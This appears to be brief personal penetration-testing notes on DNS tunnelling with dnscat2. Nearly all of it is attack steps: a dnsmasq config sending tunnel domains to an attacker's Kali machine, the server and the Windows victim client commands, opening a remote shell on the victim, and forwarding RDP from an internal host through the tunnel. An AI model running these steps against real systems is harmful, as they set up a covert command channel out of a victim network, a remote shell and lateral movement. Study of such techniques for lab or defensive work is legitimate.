DNS Tunneling

0. DNS /etc/dnsmasq.conf
server=/tunnel.com/192.168.119.120
server=/somedomain.com/192.168.119.120

(IP of Kali)

need the victim connecting to a DNS that pointing the tunneling domain to kali IP listener (may via domain fronting)

1. kali
dnscat2-server tunnel.com
sudo systemctl restart dnsmasq
2. victim
dnscat2-v0.07-client-win32.exe tunnel.com
3. dnscat2 in kali
session -i 1
shell
session -i 2
tunnel on kali (172 victim)
listen 127.0.0.1:3389 172.16.51.21:3389

Last updated